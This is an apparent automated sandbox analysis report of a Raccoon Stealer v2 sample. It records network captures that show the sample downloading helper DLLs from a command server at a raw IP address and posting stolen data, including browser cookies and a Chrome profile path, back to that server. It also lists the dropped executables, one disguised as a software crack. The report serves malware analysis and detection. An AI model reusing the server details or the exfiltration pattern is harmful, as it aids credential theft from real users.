                                      Aug 5, 2022 13:54:20.538132906 CEST13206OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:20.590812922 CEST13208INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:20 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 254392
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT
                                      ETag: "62543dbe-3e1b8"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 e8 7b 03 10 83 c4 08 85
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@BUt]h6h{
                                      Aug 5, 2022 13:54:23.897089005 CEST13476OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:23.949541092 CEST13477INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:23 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 1099223
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT
                                      ETag: "62541f08-10c5d7"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 a0 0e 00 00 0c 00 00 00 26 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 b0 0e 00 00 04 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 c0 0e 00 00 3c 00 00 00 36 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.@B/57\&@0B/70#2@B/81s:<6@B/92P
                                      Aug 5, 2022 13:54:25.544966936 CEST14636OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=vuZP5ZW3D12Zo8G4
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7421
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:25.621562004 CEST14645INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:26.529094934 CEST14646OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=7p5ysQ91wEB9Uu5W
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 597
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5c 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6f 62 6a 65 63 74 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 54 52 55 45 09 31 33 32 36 31 37 33 35 37 39 35 31 36 34 37 34 30 09 4e 49 44 09 64 6a 45 77 69 56 77 36 6d 31 56 65 56 73 7a 47 46 49 34 30 35 72 71 45 36 69 42 6c 6d 6b 74 6c 65 72 61 51 7a 74 70 45 45 41 65 41 63 61 77 5a 77 31 4a 34 38 4f 70 5a 50 49 74 54 76 67 4d 53 50 34 63 48 33 71 45 71 75 43 33 55 47 4c 52 53 71 74 69 43 52 39 47 4a 59 35 78 4b 75 67 79 41 68 63 50 4e 32 52 37 62 67 5a 52 61 67 54 52 45 7a 71 35 67 6f 57 33 4f 46 58 43 79 6f 67 68 6f 42 61 32 4e 47 50 55 48 64 74 74 43 73 6e 43 71 48 69 65 6a 47 42 46 39 66 6b 76 45 77 54 59 4b 6d 49 34 46 76 54 64 71 6f 35 6e 2b 70 58 43 62 7a 47 52 57 38 66 6c 69 4b 49 51 34 47 6e 46 67 55 48 6f 2f 35 74 44 65 58 65 46 43 30 5a 2f 46 30 55 71 75 74 53 42 49 34 49 2b 37 4a 65 6e 2b 51 6c 6c 62 77 55 59 79 31 44 4c 6a 44 45 30 48 33 45 37 53 78 6c 53 6f 53 6f 58 53 67 32 4b 41 2f 46 74 6f 7a 4d 42 4b 49 64 34 62 79 56 5a 78 6b 79 59 3d 0a 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 7c 78 39 54 61 76 79 70 41 47 54 42 75 7a 39 66 75 55 45 35 4a 66 67 4e 76 6c 45 2b 72 74 2b 2b 6c 32 4f 37 7a 54 53 76 51 57 55 45 3d 7c 38 35 2e 30 2e 34 31 38 33 2e 31 32 31 2d 36 34 0d 0a 0d 0a 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 2d 2d
                                      Data Ascii: --7p5ysQ91wEB9Uu5WContent-Disposition: form-data; name="file"; filename="\cookies.txt"Content-Type: application/x-object.google.comTRUE/TRUE13261735795164740NIDdjEwiVw6m1VeVszGFI405rqE6iBlmktleraQztpEEAeAcawZw1J48OpZPItTvgMSP4cH3qEquC3UGLRSqtiCR9GJY5xKugyAhcPN2R7bgZRagTREzq5goW3OFXCyoghoBa2NGPUHdttCsnCqHiejGBF9fkvEwTYKmI4FvTdqo5n+pXCbzGRW8fliKIQ4GnFgUHo/5tDeXeFC0Z/F0UqutSBI4I+7Jen+QllbwUYy1DLjDE0H3E7SxlSoSoXSg2KA/FtozMBKId4byVZxkyY=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default|x9TavypAGTBuz9fuUE5JfgNvlE+rt++l2O7zTSvQWUE=|85.0.4183.121-64--7p5ysQ91wEB9Uu5W--
                                      Aug 5, 2022 13:54:26.601373911 CEST 14647 IN HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.059319019 CEST 14650 OUT POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=L0zZl9hiqF02yJ84
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7135
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.123226881 CEST 14660 IN HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.133527040 CEST 14661 OUT POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=f8gayI5MWfrI48MR
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7147
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.193248034 CEST 14669 IN HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.198246002 CEST 14669 OUT POST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=8sc6O1CFgD9wm6aq
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 3565
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.258095026 CEST 14674 IN HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received

                                      Target ID:0
                                      Start time:13:52:19
                                      Start date:05/08/2022
                                      Path:C:\Users\user\Desktop\KbqArOlW06.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\KbqArOlW06.exe"
                                      Imagebase:0x720000
                                      File size:12978176 bytes
                                      MD5 hash:005297E7C0D555822B5A6F31FCDC7661
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:16
                                      Start time:13:53:58
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                                      Imagebase:0x9a0000
                                      File size:762660256 bytes
                                      MD5 hash:881CBC2DA4C6467AEC519F4909371AF8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:21
                                      Start time:13:54:08
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                                      Imagebase:0x400000
                                      File size:593460 bytes
                                      MD5 hash:B184AD382E1729FEEA1E7BB94307930F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Target ID:22
                                      Start time:13:54:12
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                                      Imagebase:0x400000
                                      File size:772608 bytes
                                      MD5 hash:D8467CA1F529C6C6DECB1B82DBAED1DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      No disassembly